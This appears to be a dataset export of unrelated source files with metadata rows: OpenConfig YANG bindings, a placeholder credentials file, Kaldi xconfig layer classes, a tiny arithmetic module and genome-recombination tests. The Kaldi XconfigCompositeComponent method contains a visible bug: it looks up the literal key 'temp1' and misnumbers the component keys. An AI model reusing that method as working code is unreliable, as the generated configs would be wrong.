"generated-type": """YANGDynClass(base=six.text_type, is_leaf=True, yang_name="endpoint-id", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, is_keyval=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='leafref', is_config=True)""",
}
)
self.__endpoint_id = t
if hasattr(self, "_set"):
self._set()
def _unset_endpoint_id(self):
self.__endpoint_id = YANGDynClass(
base=six.text_type,
is_leaf=True,
yang_name="endpoint-id",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
is_keyval=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="leafref",
is_config=True,
)
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
YANG Description: Configuration parameters relating to the
endpoint
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: Configuration parameters relating to the
endpoint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """config must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__config = t
if hasattr(self, "_set"):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(
base=config.config,
is_container="container",
yang_name="config",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
YANG Description: Operational state parameters relating to the
endpoint
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: Operational state parameters relating to the
endpoint
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """state must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__state = t
if hasattr(self, "_set"):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(
base=state.state,
is_container="container",
yang_name="state",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_local_(self):
"""
Getter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
YANG Description: Configuration and operational state parameters
relating to a local interface
"""
return self.__local_
def _set_local_(self, v, load=False):
"""
Setter method for local_, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/local (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_local_ is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_local_() directly.
YANG Description: Configuration and operational state parameters
relating to a local interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """local_ must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=local_.local_, is_container='container', yang_name="local", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__local_ = t
if hasattr(self, "_set"):
self._set()
def _unset_local_(self):
self.__local_ = YANGDynClass(
base=local_.local_,
is_container="container",
yang_name="local",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
def _get_remote(self):
"""
Getter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
YANG Description: Configuration and operational state parameters
relating to a remote interface
"""
return self.__remote
def _set_remote(self, v, load=False):
"""
Setter method for remote, mapped from YANG variable /network_instances/network_instance/connection_points/connection_point/endpoints/endpoint/remote (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_remote is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_remote() directly.
YANG Description: Configuration and operational state parameters
relating to a remote interface
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """remote must be of a type compatible with container""",
"defined-type": "container",
"generated-type": """YANGDynClass(base=remote.remote, is_container='container', yang_name="remote", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
}
)
self.__remote = t
if hasattr(self, "_set"):
self._set()
def _unset_remote(self):
self.__remote = YANGDynClass(
base=remote.remote,
is_container="container",
yang_name="remote",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
extensions=None,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="container",
is_config=True,
)
endpoint_id = __builtin__.property(_get_endpoint_id, _set_endpoint_id)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
local_ = __builtin__.property(_get_local_, _set_local_)
remote = __builtin__.property(_get_remote, _set_remote)
_pyangbind_elements = OrderedDict(
[
("endpoint_id", endpoint_id),
("config", config),
("state", state),
("local_", local_),
("remote", remote),
]
)
| 38.933594
| 377
| 0.604144
| 4,120
| 39,868
| 5.604854
| 0.049029
| 0.068855
| 0.049714
| 0.056383
| 0.983761
| 0.974363
| 0.974363
| 0.974363
| 0.974363
| 0.974363
| 0
| 0.000648
| 0.303502
| 39,868
| 1,023
| 378
| 38.971652
| 0.830957
| 0.218546
| 0
| 0.882813
| 0
| 0.013021
| 0.254554
| 0.083497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044271
| false
| 0
| 0.029948
| 0
| 0.11849
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2cadbc9eac6e1b55c93b12a413fe375e0ad6108d
| 132
|
py
|
Python
|
acct.py
|
rmdmattingly/QCI-Robinhood-Bot
|
838e077a4338d8b63fc155d7b49b1bbbe389e489
|
[
"MIT"
] | null | null | null |
acct.py
|
rmdmattingly/QCI-Robinhood-Bot
|
838e077a4338d8b63fc155d7b49b1bbbe389e489
|
[
"MIT"
] | null | null | null |
acct.py
|
rmdmattingly/QCI-Robinhood-Bot
|
838e077a4338d8b63fc155d7b49b1bbbe389e489
|
[
"MIT"
] | null | null | null |
username = 'UPDATE_TO_YOUR_ROBINHOOD_USERNAME'
password = 'UPDATE_TO_YOUR_ROBINHOOD_PASSWORD'
key = 'UPDATE_TO_YOUR_QUIKFO_API_KEY'
| 33
| 46
| 0.863636
| 19
| 132
| 5.315789
| 0.473684
| 0.237624
| 0.356436
| 0.415842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068182
| 132
| 3
| 47
| 44
| 0.821138
| 0
| 0
| 0
| 0
| 0
| 0.719697
| 0.719697
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.333333
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
e2e7cfc5028c3c92d359e9123726e5918c93f739
| 10,572
|
py
|
Python
|
egs/wsj/s5/steps/libs/nnet3/xconfig/added_components.py
|
XIEXurong/kaldi_bayes_adapt
|
54d108361fe881667055aa0f299f9658ad3585f8
|
[
"Apache-2.0"
] | 1
|
2022-02-09T16:05:18.000Z
|
2022-02-09T16:05:18.000Z
|
egs/wsj/s5/steps/libs/nnet3/xconfig/added_components.py
|
XIEXurong/kaldi_bayes_adapt
|
54d108361fe881667055aa0f299f9658ad3585f8
|
[
"Apache-2.0"
] | null | null | null |
egs/wsj/s5/steps/libs/nnet3/xconfig/added_components.py
|
XIEXurong/kaldi_bayes_adapt
|
54d108361fe881667055aa0f299f9658ad3585f8
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import print_function
import math
import re
import sys
from libs.nnet3.xconfig.basic_layers import XconfigLayerBase
class XconfigDimRangeComponentInit(XconfigLayerBase):
"""This class is for parsing lines like
'dim-range-component name=feature1 input=Append(-3,0,3) dim=40 dim-offset=0'
which will produce just a single component, of part of the input.
Parameters of the class, and their defaults:
input='[-1]' [Descriptor giving the input of the layer.]
dim=-1 [Dimension of the output.]
dim-offset=0 [Dimension offset of the input.]
"""
def __init__(self, first_token, key_to_value, prev_names=None):
XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)
def set_default_configs(self):
self.config = {'input': '[-1]',
'dim': -1,
'dim-offset': 0 }
def check_configs(self):
input_dim = self.descriptors['input']['dim']
if self.config['dim'] <= 0:
raise RuntimeError("'dim' must be specified and > 0.")
elif self.config['dim'] > input_dim:
raise RuntimeError("'dim' must be specified and lower than the input dim.")
if self.config['dim-offset'] < 0 :
raise RuntimeError("'dim-offset' must be specified and >= 0.")
elif self.config['dim-offset'] + self.config['dim'] > input_dim:
raise RuntimeError("'dim-offset' plus output dim must be lower than the input dim.")
def output_name(self, auxiliary_output=None):
assert auxiliary_output is None
return self.name
def output_dim(self, auxiliary_output=None):
assert auxiliary_output is None
output_dim = self.config['dim']
if output_dim <= 0:
self.config['dim'] = self.descriptors['input']['dim']
return output_dim
def get_full_config(self):
ans = []
config_lines = self._generate_config()
for line in config_lines:
for config_name in ['init', 'ref', 'final']:
# we do not support user specified matrices in this layer
# so 'ref' and 'final' configs are the same.
ans.append((config_name, line))
return ans
def _generate_config(self):
# by 'descriptor_final_string' we mean a string that can appear in
# config-files, i.e. it contains the 'final' names of nodes.
input_node = self.descriptors['input']['final-string']
output_dim = self.config['dim']
dim_offset = self.config['dim-offset']
configs = []
line = ('dim-range-node name={0} input-node={1} dim={2} dim-offset={3}'.format(
self.name, input_node, output_dim, dim_offset))
configs.append(line)
return configs
class XconfigElementwiseProductComponent(XconfigLayerBase):
"""This class is for parsing lines like
'elementwise-product-component name=noop1 input=Append(-3,0,3) dim=40'
which will produce just a single component, of type NoOpComponent.
Parameters of the class, and their defaults:
input='[-1]' [Descriptor giving the input of the layer.]
"""
def __init__(self, first_token, key_to_value, prev_names=None):
XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)
def set_default_configs(self):
self.config = {'input': '[-1]',
'dim': -1 }
def check_configs(self):
input_dim = self.descriptors['input']['dim']
if self.config['dim'] <= 0:
raise RuntimeError("'dim' must be specified and > 0.")
elif self.config['dim'] > input_dim:
raise RuntimeError("'dim' must be specified and lower than the input dim.")
elif input_dim % self.config['dim'] != 0:
raise RuntimeError("input dim must be some times of the 'dim'.")
def output_name(self, auxiliary_output=None):
assert auxiliary_output is None
return self.name
def output_dim(self, auxiliary_output=None):
assert auxiliary_output is None
output_dim = self.config['dim']
if output_dim <= 0:
self.config['dim'] = self.descriptors['input']['dim']
return output_dim
def get_full_config(self):
ans = []
config_lines = self._generate_config()
for line in config_lines:
for config_name in ['ref', 'final']:
# we do not support user specified matrices in this layer
# so 'ref' and 'final' configs are the same.
ans.append((config_name, line))
return ans
def _generate_config(self):
# by 'descriptor_final_string' we mean a string that can appear in
# config-files, i.e. it contains the 'final' names of nodes.
input_desc = self.descriptors['input']['final-string']
input_dim = self.descriptors['input']['dim']
output_dim = self.config['dim']
configs = []
line = ('component name={0} type=ElementwiseProductComponent output-dim={1} input-dim={2}'.format(
self.name, output_dim, input_dim))
configs.append(line)
line = ('component-node name={0} component={0} input={1}'.format(
self.name, input_desc))
configs.append(line)
return configs
class XconfigSimpleComponent(XconfigLayerBase):
"""This class is for parsing lines like
'simple-component name=scale type=FixedScaleComponent dim=1536 opts="scale=2 dim=1536"'
which will produce just a single component, of type NoOpComponent.
Parameters of the class, and their defaults:
input='[-1]' [Descriptor giving the input of the layer.]
"""
def __init__(self, first_token, key_to_value, prev_names=None):
XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)
def set_default_configs(self):
self.config = {'input': '[-1]',
'dim': -1,
'type': 'error',
'opts': 'error' }
def check_configs(self):
pass
def output_name(self, auxiliary_output=None):
assert auxiliary_output is None
return self.name
def output_dim(self, auxiliary_output=None):
assert auxiliary_output is None
output_dim = self.config['dim']
if output_dim <= 0:
self.config['dim'] = self.descriptors['input']['dim']
return output_dim
def get_full_config(self):
ans = []
config_lines = self._generate_config()
for line in config_lines:
for config_name in ['ref', 'final']:
# we do not support user specified matrices in this layer
# so 'ref' and 'final' configs are the same.
ans.append((config_name, line))
return ans
def _generate_config(self):
# by 'descriptor_final_string' we mean a string that can appear in
# config-files, i.e. it contains the 'final' names of nodes.
input_desc = self.descriptors['input']['final-string']
input_dim = self.descriptors['input']['dim']
output_dim = self.config['dim']
component_type = self.config['type']
component_opts = self.config['opts']
configs = []
line = ('component name={0} type={1} {2}'.format(
self.name, component_type, component_opts))
configs.append(line)
line = ('component-node name={0} component={0} input={1}'.format(
self.name, input_desc))
configs.append(line)
return configs
class XconfigCompositeComponent(XconfigLayerBase):
"""This class is for parsing lines like
'simple-component name=scale type=FixedScaleComponent dim=1536 opts="scale=2 dim=1536"'
which will produce just a single component, of type NoOpComponent.
Parameters of the class, and their defaults:
input='[-1]' [Descriptor giving the input of the layer.]
"""
def __init__(self, first_token, key_to_value, prev_names=None):
XconfigLayerBase.__init__(self, first_token, key_to_value, prev_names)
def set_default_configs(self):
self.config = {'input': '[-1]',
'dim': -1,
'max_rows_process': 2048,
'num_components': 1,
'component1': 'error',
'component2': 'error',
'component3': 'error',
'component4': 'error',
'component5': 'error',
'component6': 'error',
'component7': 'error',
'component8': 'error',
'component9': 'error',
'component10': 'error',
'component11': 'error'}
def check_configs(self):
pass
def output_name(self, auxiliary_output=None):
assert auxiliary_output is None
return self.name
def output_dim(self, auxiliary_output=None):
assert auxiliary_output is None
output_dim = self.config['dim']
if output_dim <= 0:
self.config['dim'] = self.descriptors['input']['dim']
return output_dim
def get_full_config(self):
ans = []
config_lines = self._generate_config()
for line in config_lines:
for config_name in ['ref', 'final']:
# we do not support user specified matrices in this layer
# so 'ref' and 'final' configs are the same.
ans.append((config_name, line))
return ans
def _generate_config(self):
# by 'descriptor_final_string' we mean a string that can appear in
# config-files, i.e. it contains the 'final' names of nodes.
input_desc = self.descriptors['input']['final-string']
input_dim = self.descriptors['input']['dim']
output_dim = self.config['dim']
max_rows_process = self.config['max_rows_process']
num_components = self.config['num_components']
sub_components = []
for i in range(num_components):
temp1 = 'component'+str(i)
temp = self.config['temp1']
temp = 'component'+str(i)+'='+"\'"+temp+"\'"
sub_components.append(temp)
sub_component_all = ' '.join(sub_components)
configs = []
line = ('component name={0} max_rows_process={1} num_components={2} {3}'.format(
self.name, max_rows_process, num_components, sub_component_all))
configs.append(line)
line = ('component-node name={0} component={0} input={1}'.format(
self.name, input_desc))
configs.append(line)
return configs
| 38.443636
| 106
| 0.61417
| 1,307
| 10,572
| 4.800306
| 0.119357
| 0.047816
| 0.043513
| 0.032993
| 0.805228
| 0.777016
| 0.754861
| 0.748805
| 0.721549
| 0.715811
| 0
| 0.013112
| 0.271377
| 10,572
| 274
| 107
| 38.583942
| 0.801376
| 0.20961
| 0
| 0.71123
| 0
| 0.005348
| 0.156679
| 0.00389
| 0.005348
| 0
| 0
| 0
| 0.042781
| 1
| 0.149733
| false
| 0.010695
| 0.026738
| 0
| 0.283422
| 0.005348
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e2f3968c3b87e6ca96e984a7bef4d554fdf3bb99
| 131
|
py
|
Python
|
Workers/PythonEvaluation/Executables/Calculation.py
|
IshmaGurca/SwarmAnalytics
|
81688dac4d32d568cfac218224a45cbf048b2af9
|
[
"MIT"
] | null | null | null |
Workers/PythonEvaluation/Executables/Calculation.py
|
IshmaGurca/SwarmAnalytics
|
81688dac4d32d568cfac218224a45cbf048b2af9
|
[
"MIT"
] | null | null | null |
Workers/PythonEvaluation/Executables/Calculation.py
|
IshmaGurca/SwarmAnalytics
|
81688dac4d32d568cfac218224a45cbf048b2af9
|
[
"MIT"
] | null | null | null |
def Plus(a,b):
return a + b
def Minus(a,b):
return a - b
def Times(a,b):
return a*b
def Divide(a,b):
return a/b
| 10.916667
| 16
| 0.549618
| 28
| 131
| 2.571429
| 0.285714
| 0.222222
| 0.444444
| 0.5
| 0.680556
| 0.541667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.29771
| 131
| 11
| 17
| 11.909091
| 0.782609
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
1a4f3c0b0d7270eda2eca3fb8c1cdd937d5a0ff6
| 41,255
|
py
|
Python
|
src/edge/tests/test_recombine.py
|
jvrana/edge
|
b38efc3dfe3e888ee3045539bc00152771baccc0
|
[
"MIT"
] | null | null | null |
src/edge/tests/test_recombine.py
|
jvrana/edge
|
b38efc3dfe3e888ee3045539bc00152771baccc0
|
[
"MIT"
] | null | null | null |
src/edge/tests/test_recombine.py
|
jvrana/edge
|
b38efc3dfe3e888ee3045539bc00152771baccc0
|
[
"MIT"
] | null | null | null |
import os
import json
from Bio.Seq import Seq
from django.test import TestCase
import edge.recombine
from edge.recombine import find_swap_region, recombine, remove_overhangs
from edge.blastdb import build_all_genome_dbs, fragment_fasta_fn
from edge.models import Genome, Fragment, Genome_Fragment, Operation
class RemoveOverhangsTest(TestCase):
def test_removes_front_overhang(self):
self.assertEquals(remove_overhangs('(atg/)aa'), 'aa')
def test_removes_back_overhang(self):
self.assertEquals(remove_overhangs('aa(atg/)'), 'aa')
def test_removes_front_and_back(self):
self.assertEquals(remove_overhangs('(atg/)aa(atg/)'), 'aa')
def test_does_not_remove_internal_overhang(self):
self.assertEquals(remove_overhangs('(atg/)a(atg/)a(atg/)'), 'a(atg/)a')
def test_does_not_remove_unclosed_overhang(self):
self.assertEquals(remove_overhangs('(atg/aa'), '(atg/aa')
self.assertEquals(remove_overhangs('atg/aa)'), 'atg/aa)')
def test_works_with_single_char_input(self):
self.assertEquals(remove_overhangs(')'), ')')
self.assertEquals(remove_overhangs('('), '(')
class GenomeRecombinationTest(TestCase):
def setUp(self):
self.old_check_junction_lu = edge.recombine.CHECK_JUNCTION_LEFT_UP
self.old_check_junction_ld = edge.recombine.CHECK_JUNCTION_LEFT_DN
self.old_check_junction_ru = edge.recombine.CHECK_JUNCTION_RIGHT_UP
self.old_check_junction_rd = edge.recombine.CHECK_JUNCTION_RIGHT_DN
edge.recombine.CHECK_JUNCTION_LEFT_UP = 10
edge.recombine.CHECK_JUNCTION_LEFT_DN = 40
edge.recombine.CHECK_JUNCTION_RIGHT_UP = 40
edge.recombine.CHECK_JUNCTION_RIGHT_DN = 10
self.old_single_cross_over_gap_max = edge.recombine.SINGLE_CROSSOVER_MAX_GAP
edge.recombine.SINGLE_CROSSOVER_MAX_GAP = 10
def tearDown(self):
edge.recombine.CHECK_JUNCTION_LEFT_UP = self.old_check_junction_lu
edge.recombine.CHECK_JUNCTION_LEFT_DN = self.old_check_junction_ld
edge.recombine.CHECK_JUNCTION_RIGHT_UP = self.old_check_junction_ru
edge.recombine.CHECK_JUNCTION_RIGHT_DN = self.old_check_junction_rd
edge.recombine.SINGLE_CROSSOVER_MAX_GAP = self.old_single_cross_over_gap_max
def build_genome(self, circular, *templates):
g = Genome(name='Foo')
g.save()
for seq in templates:
f = Fragment.create_with_sequence('Bar', seq, circular=circular)
Genome_Fragment(genome=g, fragment=f, inherited=False).save()
try:
os.unlink(fragment_fasta_fn(f))
except:
pass
build_all_genome_dbs(refresh=True)
return Genome.objects.get(pk=g.id)
def test_finds_correct_region_for_swapping(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
g = self.build_genome(False, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(upstream) + 1)
self.assertEquals(r[0].end, len(template) - len(downstream))
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, False)
self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finding_swap_region_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([middle[8:], back_bs, downstream, upstream, front_bs, middle[0:8]])
g = self.build_genome(True, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(template) - 8 - len(front_bs) + 1)
self.assertEquals(r[0].end, len(middle) - 8 + len(back_bs))
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, False)
self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finding_swap_region_when_front_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([front_bs[8:], middle, back_bs, downstream, upstream, front_bs[0:8]])
g = self.build_genome(True, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(template) - 8 + 1)
self.assertEquals(r[0].end, len(front_bs + middle + back_bs) - 8)
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, False)
self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finding_swap_region_when_back_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = ''.join([front_bs, replaced, back_bs])
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([back_bs[8:], downstream, upstream, front_bs, middle, back_bs[0:8]])
g = self.build_genome(True, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(back_bs) - 8 + len(downstream + upstream) + 1)
self.assertEquals(r[0].end, len(back_bs) - 8)
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, False)
self.assertEquals(r[0].front_arm, front_bs[0:arm_len])
self.assertEquals(r[0].back_arm, back_bs[-arm_len:])
def test_finds_correct_region_for_swapping_with_reverse_complement_cassette(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([upstream, front_bs, middle, back_bs, downstream])
g = self.build_genome(False, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(upstream) + 1)
self.assertEquals(r[0].end, len(template) - len(downstream))
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, True)
self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_finding_reverse_complement_region_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([middle[8:], back_bs, downstream, upstream, front_bs, middle[0:8]])
g = self.build_genome(True, template)
r = find_swap_region(g, cassette, arm_len)
self.assertEquals(len(r), 1)
self.assertEquals(r[0].fragment_id, g.fragments.all()[0].id)
self.assertEquals(r[0].fragment_name, g.fragments.all()[0].name)
self.assertEquals(r[0].start, len(template) - 8 - len(front_bs) + 1)
self.assertEquals(r[0].end, len(middle) - 8 + len(back_bs))
self.assertEquals(r[0].sequence, ''.join([front_bs, middle, back_bs]))
self.assertEquals(r[0].cassette_reversed, True)
self.assertEquals(r[0].front_arm, str(Seq(back_bs[-arm_len:]).reverse_complement()))
self.assertEquals(r[0].back_arm, str(Seq(front_bs[0:arm_len]).reverse_complement()))
def test_finding_reverse_complement_region_when_front_arm_is_across_circular_boundary(self):
upstream = "gagattgtccgcgtttt"
front_bs = "catagcgcacaggacgcggag"
middle = "cggcacctgtgagccg"
back_bs = "taatgaccccgaagcagg"
downstream = "gttaaggcgcgaacat"
replaced = "aaaaaaaaaaaaaaaaaaa"
cassette = str(Seq(''.join([front_bs, replaced, back_bs])).reverse_complement())
arm_len = min(len(front_bs), len(back_bs))
template = ''.join([front_bs[8:], middle, back_bs, downstream, upstream, front_bs[0:8]])
